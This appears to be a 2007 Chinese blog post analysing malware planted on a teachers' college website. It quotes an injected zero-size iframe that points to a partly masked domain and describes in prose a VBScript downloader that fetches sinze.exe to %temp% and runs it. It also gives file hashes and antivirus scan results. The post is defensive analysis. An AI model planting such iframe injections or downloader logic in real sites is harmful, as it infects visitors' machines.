01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

endurer 原创

2007-01-15 第2版 补充Kaspersky的反应
2007-01-12 第1

网站的网页被加入代码:
/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/

sin**ze*.htm   Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei

在浏览器中打开该网页,会看到信息:
/------
就不让你看!气死你 by ******!
------/
其中******处的字符串可能是作者昵称,这里偶匿了。

还没完,网页中接下来有利用Replace()来保护自身的VBScript脚本,会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%/g0ld.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

sinze.exe 采用 ASPack 加壳

文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-12 16:21:11
修改时间 : 2007-1-12 16:21:13
访问时间 : 2007-1-12 16:28:57
大小 : 88708 字节 86.644 KB
MD5 : 118e7d74d99e10cef293b254e1dc78ff

Complete scanning result of "__25968", received in VirusTotal at 01.12.2007, 10:20:11 (CET).

AntivirusVersionUpdateResult
AntiVir7.3.0.2101.09.2007HEUR/Crypted
Authentium4.93.801.12.2007could be a corrupted executable file
Avast4.7.892.012.30.2006 no virus found
AVG38601.11.2007 no virus found
BitDefender7.201.12.2007 no virus found
CAT-QuickHeal9.0001.12.2007 no virus found
ClamAVdevel-2006042601.12.2007 no virus found
DrWeb4.3301.12.2007 no virus found
eSafe7.0.14.001.10.2007Suspicious Trojan/Worm
eTrust-InoculateIT23.73.11201.12.2007 no virus found
eTrust-Vet30.3.331901.11.2007 no virus found
Ewido4.001.11.2007 no virus found
Fortinet2.82.0.001.12.2007suspicious
F-Prot3.16f01.11.2007 no virus found
F-Prot44.2.1.2901.12.2007 no virus found
IkarusT3.1.0.2701.09.2007 no virus found
Kaspersky4.0.2.2401.12.2007 no virus found
McAfee493701.11.2007 no virus found
Microsoft1.190401.12.2007 no virus found
NOD32v2197201.11.2007 no virus found
Norman5.80.0201.11.2007 no virus found
Panda9.0.0.401.12.2007 no virus found
Prevx1V201.12.2007 no virus found
Sophos4.13.001.11.2007 no virus found
Sunbelt2.2.907.001.12.2007VIPRE.Suspicious
TheHacker6.0.3.14701.11.2007 no virus found
UNA1.8301.11.2007 no virus found
VBA323.11.201.10.2007 no virus found
VirusBuster4.3.19:901.11.2007 no virus found

Aditional Information

File size: 88708 bytes

MD5: 118e7d74d99e10cef293b254e1dc78ff

SHA1: 7e562cfafef92b5f17d279beb2c968bd9e612817

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics. 

今天重下载了这个文件:

文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-15 16:11:33
修改时间 : 2007-1-15 16:13:51
访问时间 : 2007-1-15 16:14:42
大小 : 425569 字节 415.609 KB
MD5 : 03111c59838bf6e6a16ad64413ed3954

下载过程中曾被KAV6拦截了一次,只得到了414,453字节。

Kaspersky报为:Virus.Win32.Delf.an

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值